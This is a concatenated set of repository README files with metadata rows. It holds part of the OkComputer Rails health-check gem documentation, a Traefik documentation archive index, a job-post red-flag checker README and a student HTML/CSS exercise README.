### If Not Using ActiveRecord

We also include a MongoidCheck, but do not register it.
If you use Mongoid, replace the default ActiveRecord check like so: ```ruby OkComputer::Registry.register "database", OkComputer::MongoidCheck.new ``` If you use another database adapter, see Registering Custom Checks below to build your own database check and register it with the name "database" to replace the built-in check, or use `OkComputer::Registry.deregister "database"` to stop checking your database altogether. ### Requiring Authentication Optionally require HTTP Basic authentication to view the results of checks in an initializer, like so: ```ruby # config/initializers/okcomputer.rb OkComputer.require_authentication("username", "password") ``` To allow access to specific checks without a password, optionally specify the names of the checks: ```ruby # config/initializers/okcomputer.rb OkComputer.require_authentication("username", "password", except: %w(default nonsecret)) ``` ### Changing the OkComputer Route By default, OkComputer routes are mounted at `/okcomputer`. If you'd like to use an alternate route, you can configure it with: ```ruby # config/initializers/okcomputer.rb OkComputer.mount_at = 'health_checks' # mounts at /health_checks ``` For more control of adding OkComputer to your routes, set `OkComputer.mount_at = false` to disable automatic mounting, and you can manually mount the engine in your `routes.rb`. ```ruby # config/initializers/okcomputer.rb OkComputer.mount_at = false # config/routes.rb, at any priority that suits you mount OkComputer::Engine, at: "/custom_path" ``` ### Logging check results Log check results by setting `OkComputer.logger`. Note: results will be logged at the `info` level. 
```ruby OkComputer.logger = Rails.logger ``` ```sh [okcomputer] mycheck: PASSED mymessage (0s) ``` ### Registering Additional Checks Register additional checks in an initializer, like so: ```ruby # config/initializers/okcomputer.rb OkComputer::Registry.register "resque_down", OkComputer::ResqueDownCheck.new OkComputer::Registry.register "resque_backed_up", OkComputer::ResqueBackedUpCheck.new("critical", 100) # This check works on 2.4.0 and above versions of resque-scheduler OkComputer::Registry.register "resque_scheduler_down", OkComputer::ResqueSchedulerCheck.new ``` ### Registering Custom Checks The simplest way to register a check unique to your application is to subclass OkComputer::Check and implement your own `#check` method, which sets the display message with `mark_message`, and calls `mark_failure` if anything is wrong. ```ruby # config/initializers/okcomputer.rb class MyCustomCheck < OkComputer::Check def check if rand(10).even? mark_message "Even is great!" else mark_failure mark_message "We don't like odd numbers" end end end OkComputer::Registry.register "check_for_odds", MyCustomCheck.new ``` ### Registering Optional Checks Register an optional check like so: ```ruby # ... OkComputer::Registry.register "some_optional_check", OkComputer::ResqueBackedUpCheck.new("critical", 100) # ... OkComputer.make_optional %w(some_optional_check another_optional_check) ``` This check will run and report its status, but will not affect the HTTP status code returned. ### Customizing plain-text output The plain-text output flows through Rails' internationalization framework. Adjust the output as necessary by defining `okcomputer.check.passed` and `okcomputer.check.failed` keys in your setup. The default values are available [in `okcomputer.en.yml`][i18n]. [i18n]:https://github.com/sportngin/okcomputer/blob/eb0be05cc1527e083edd63cfbb0a071f7892c822/config/locales/okcomputer.en.yml#L1-L5 ## Running checks in parallel By default, OkComputer runs checks in sequence. 
If you'd like to run them in parallel, you can configure it with: ```ruby # config/initializers/okcomputer.rb OkComputer.check_in_parallel = true ``` ## Performing Checks * Perform a simple up check: http://example.com/okcomputer * Perform all installed checks: http://example.com/okcomputer/all * Perform a specific installed check: http://example.com/okcomputer/database Checks are available as plain text (by default) or JSON by appending .json, e.g.: * http://example.com/okcomputer.json * http://example.com/okcomputer/all.json ## OkComputer NewRelic Ignore If NewRelic is installed, OkComputer automatically disables NewRelic monitoring for uptime checks, as it will start to artificially bring your request time down. If you'd like to intentionally count OkComputer requests in your NewRelic analytics, set: ``` # config/initializers/okcomputer.rb OkComputer.analytics_ignore = false ``` ## Development ### Setup ```plaintext $ bundle install ``` ### Running the test suite OkComputer tests are written with [RSpec](http://rspec.info/). To run the full test suite: ```plaintext $ rake spec ``` You may also use the environment variable `RAILS_VERSION` with one of the supported versions of Rails (found at the top of this file) to bundle and run the tests with a specific version of Rails. ## Contributing 1. Fork it 2. Create your feature branch (`git checkout -b my-new-feature`) 3. Commit your changes (`git commit -am 'Add some feature'`) 4. Push to the branch (`git push origin my-new-feature`) 5. Create new Pull Request [fitter-happier]:https://rubygems.org/gems/fitter-happier
29.372881
138
0.769475
eng_Latn
0.915713
6f6c323ae6194545ecc4d4cd621da4783737076a
607
md
Markdown
docs/archive.md
dongdongking008/traefik
9b3750320bbfa937d7f9e433f3d4c13e859aed55
[ "MIT" ]
1
2017-12-31T11:03:01.000Z
2017-12-31T11:03:01.000Z
docs/archive.md
dongdongking008/traefik
9b3750320bbfa937d7f9e433f3d4c13e859aed55
[ "MIT" ]
3
2021-05-09T04:14:26.000Z
2022-03-02T09:50:41.000Z
docs/archive.md
dongdongking008/traefik
9b3750320bbfa937d7f9e433f3d4c13e859aed55
[ "MIT" ]
1
2018-04-18T14:05:26.000Z
2018-04-18T14:05:26.000Z
## Current versions documentation

- [Latest stable](https://docs.traefik.io)

## Future version documentation

- [Experimental](https://master--traefik-docs.netlify.com/)

## Previous versions documentation

- [v1.5 aka Cancoillotte](http://v1-5.archive.docs.traefik.io/)
- [v1.4 aka Roquefort](http://v1-4.archive.docs.traefik.io/)
- [v1.3 aka Raclette](http://v1-3.archive.docs.traefik.io/)
- [v1.2 aka Morbier](http://v1-2.archive.docs.traefik.io/)
- [v1.1 aka Camembert](http://v1-1.archive.docs.traefik.io/)

## More

[Change log](https://github.com/containous/traefik/blob/master/CHANGELOG.md)
25.291667
76
0.711697
yue_Hant
0.434057
6f6c5919004dc969a85ac65caf8fb64fcec3a422
846
md
Markdown
README.md
q3e/devjob-redflag
987b7d4e1dd9ae9fcf06236e5d7e7849639fa563
[ "MIT" ]
null
null
null
README.md
q3e/devjob-redflag
987b7d4e1dd9ae9fcf06236e5d7e7849639fa563
[ "MIT" ]
null
null
null
README.md
q3e/devjob-redflag
987b7d4e1dd9ae9fcf06236e5d7e7849639fa563
[ "MIT" ]
null
null
null
# devjob-redflag

inspired by https://mobile.twitter.com/mgoldst/status/1231234970968109057 - plus more red flags

## What it does

Helps you identify common developer job posts that may be a waste of time applying for.

## Why?

- Some job posts are there just to harvest developer resumes for future use
- Some are just exploitative roles and toxic companies.

...

## How to use

run

```
npm i devpost-redflag
```

Find a specific job post that you would like to check. Get the URL to that post, then in your project:

```
const checkRedflag = require('devpost-redflag')

checkRedflag('https://www.indeed.com/q-Rockstar-Java-Developer-jobs.html?vjk=c788c338e737283f')
  .then(result => {
    console.log(result) // { flagsFound: [ 'rockstar' ], rate: '8.333333333333332%' }
  })
```

## todo

- [ ] global install using cli args
- [ ] browser extension
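The usage snippet in the README above fetches a job post and reports `flagsFound` plus a percentage `rate` (matched flag terms over the total flag list). That scoring idea can be sketched in a few lines of Python; the function name and the 12-term flag list here are illustrative assumptions, not the package's actual implementation:

```python
def redflag_rate(text, flags=None):
    """Score a job-post text against a list of red-flag terms.

    Returns (flags_found, rate) where rate is the percentage of the
    flag list that matched. The default list below is purely
    illustrative -- the real package ships its own terms.
    """
    if flags is None:
        flags = ["rockstar", "ninja", "wizard", "guru", "fast-paced",
                 "wear many hats", "work hard play hard", "unpaid",
                 "family", "hustle", "10x", "competitive salary"]
    lowered = text.lower()
    found = [flag for flag in flags if flag in lowered]
    rate = 100.0 * len(found) / len(flags)
    return found, rate


found, rate = redflag_rate("Seeking a Rockstar Java Developer")
# One hit out of a 12-term list gives a rate of about 8.33%, in line
# with the README's example output.
```

A case-insensitive substring match keeps the sketch simple; a real implementation would likely tokenize or use word boundaries to avoid false positives inside longer words.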
22.263158
102
0.72695
eng_Latn
0.961997
6f6c59710d4157cfdf1ffc067590f92b90d4191b
643
md
Markdown
readme.md
BAPotts/boring-lecture
08f643e75ddc443c05ba6ec9b441a20bb5be621f
[ "MIT" ]
null
null
null
readme.md
BAPotts/boring-lecture
08f643e75ddc443c05ba6ec9b441a20bb5be621f
[ "MIT" ]
null
null
null
readme.md
BAPotts/boring-lecture
08f643e75ddc443c05ba6ec9b441a20bb5be621f
[ "MIT" ]
null
null
null
# _Boring Lecture_

#### _HTML/CSS exercise for Epicodus, 6/3/2020_

#### By _**Beverly Potts**_

## Description

_This web page shows a picture of a teacher and includes several paragraphs of dummy text to practice working with CSS rules._

## Setup/Installation Requirements

* Clone this repository
* Navigate to the boring-lecture directory
* Open index.html in a browser to view the page!

## Known Bugs

_There are no known bugs at this time._

## Support and contact details

_Contact: pottsbeverly@gmail.com_

## Technologies Used

_HTML, CSS_

### License

*This is licensed under the MIT license.*

Copyright (c) 2020 **_Beverly Potts_**
18.911765
124
0.746501
eng_Latn
0.978013